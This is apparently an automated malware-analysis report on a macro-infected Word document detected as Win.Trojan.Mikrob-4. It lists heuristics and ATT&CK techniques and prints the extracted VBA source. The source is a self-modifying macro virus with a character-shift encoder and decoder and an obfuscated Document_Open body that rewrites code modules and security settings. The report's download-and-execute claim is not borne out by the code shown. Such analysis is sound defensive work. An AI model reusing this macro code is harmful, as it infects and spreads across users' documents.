Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Win.Trojan.Mikrob-4. It contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The macro's obfuscated nature suggests it is designed to download and execute a secondary payload, aligning with the behavior of a trojan.
Heuristics (3)
- ClamAV: Win.Trojan.Mikrob-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Mikrob-4
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4705 bytes |

SHA-256 (macros.bas): 24c544b67e411df3ef5ee78819a2427cd93a11272215bdc80555c6d6e15ade19
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Sinteza
Private Sub Document_Open()
'¡•MjM€¡Ÿ–›” [�Ÿ–šU�•– qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[y–›’ U^YMŒ
'�•– qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[pœ¢›¡|“y–›’ VV
'v“M{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[y–›’ U^YM^VMikMOT€–›¡’§ŽOM�•’›
'MMMM{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[q’™’¡’y–›’ M^YMŒ
'MMMM{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[pœ¢›¡|“y–›’
'MMMM{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[n‘‘sŸœš€¡Ÿ–›”M¡•
'r›‘Mv“
'v“Mn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[y–›’ U^YM^VMikMOT€–›¡’§ŽOM�•’›
'MMMMn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[q’™’¡’y–›’ M^YMŒ
'MMMMn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[pœ¢›¡|“y–›’
'MMMMn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[n‘‘sŸœš€¡Ÿ–›”M¡•
'r›‘Mv“
'v“Mq–ŸUO�g‰Ž¢¡œ’¥’�[‘Ÿ£OVMikMOŽ¢¡œ’¥’�[‘Ÿ£OM�•’›
'MMMM|�’›MO�g‰Ž¢¡œ’¥’�[‘Ÿ£OMsœŸM|¢¡�¢¡Mn MP^
'MMMM}Ÿ–›¡MP^YM¡•
'MMMMp™œ ’MP^
'r›‘Mv“
'v“Mq–ŸUO�g‰�œ›“–”[£� OVMikMO�œ›“–”[£� OM�•’›
'MMMM|�’›MOpg‰�œ›“–”[£� OMsœŸM|¢¡�¢¡Mn MP^
'MMMM}Ÿ–›¡MP^YMO‘–šMŽY�O
'MMMM}Ÿ–›¡MP^YMO ’¡MŽMjM�Ÿ’Ž¡’œ�—’�¡UOO¤œŸ‘[Ž��™–�Ž¡–œ›OOVO
'MMMM}Ÿ–›¡MP^YMO ’¡M�MjMŽ[›œŸšŽ™¡’š�™Ž¡’[£��Ÿœ—’�¡[£��œš�œ›’›¡ U^V[�œ‘’šœ‘¢™’O
'MMMM}Ÿ–›¡MP^YMO–“M�[™–›’ U^Y^VMikMOOT€–›¡’§ŽOOM¡•’›O
'MMMM}Ÿ–›¡MP^YMO�[Ž‘‘“Ÿœš“–™’MOO�g‰Ž¢¡œ’¥’�[‘Ÿ£OOO
'MMMM}Ÿ–›¡MP^YMO’›‘M–“O
'MMMM}Ÿ–›¡MP^YMOŽ[~¢–¡O
'MMMMp™œ ’MP^
'MMMM€¦ ¡’š[}Ÿ–£Ž¡’}Ÿœ“–™’€¡Ÿ–›”UOOYMOuxr†Œp‚ r{�Œ‚€r ‰€œ“¡¤ŽŸ’‰z–�Ÿœ œ“¡‰|““–�’‰f[]‰„œŸ‘‰€’�¢Ÿ–¡¦OYMOy’£’™OVMjM^S
'r›‘Mv“
'€¦ ¡’š[}Ÿ–£Ž¡’}Ÿœ“–™’€¡Ÿ–›”UOOYMOuxr†Œy|pnyŒznpuv{r‰€œ“¡¤ŽŸ’‰z–�Ÿœ œ“¡‰„–›‘œ¤ ‰p¢ŸŸ’›¡ƒ’Ÿ –œ›‰ ¢›OYMOx’Ÿ›’™`_€’¡OVMjMO�g‰�œ›“–”[£� O
'€’¡n¡¡ŸMO�g‰Ž¢¡œ’¥’�[‘Ÿ£OYM£�u–‘‘’›
'€’¡n¡¡ŸMO�g‰�œ›“–”[£� OYM£�u–‘‘’›
End Sub
Private Sub Document_Close()
    ' Decoding stage: if line 3 of the module is still a comment, strip the
    ' leading apostrophe from lines 3-34 and shift every character back by 45
    If Left(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1), 1) = "'" Then
        For I = 3 To 34
            naskod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
            F = Right(naskod, Len(naskod) - 1)
            ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine I, F
        Next
        For i2 = 3 To 34
            nkod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(i2, 1)
            For a1 = 1 To Len(nkod)
                dnk = dnk & Chr(Asc(Mid(nkod, a1)) - 45)
                ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i2, dnk
            Next
            dnk = ""
        Next
    End If
    ' Execute the now-decoded Document_Open body
    Document_Open
    ' Re-encoding stage: shift each character of lines 3-34 forward by 45 and
    ' comment the lines out again so the module is saved in obfuscated form
    If Left(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1), 1) <> "'" Then
        For G = 3 To 34
            naskod2 = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(G, 1)
            If Left(naskod2, 1) <> "'" Then
                For a2 = 1 To Len(naskod2)
                    enk = enk & Chr(Asc(Mid(naskod2, a2)) + 45)
                    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine G, "'" & enk
                Next
                enk = ""
            End If
        Next
    End If
End Sub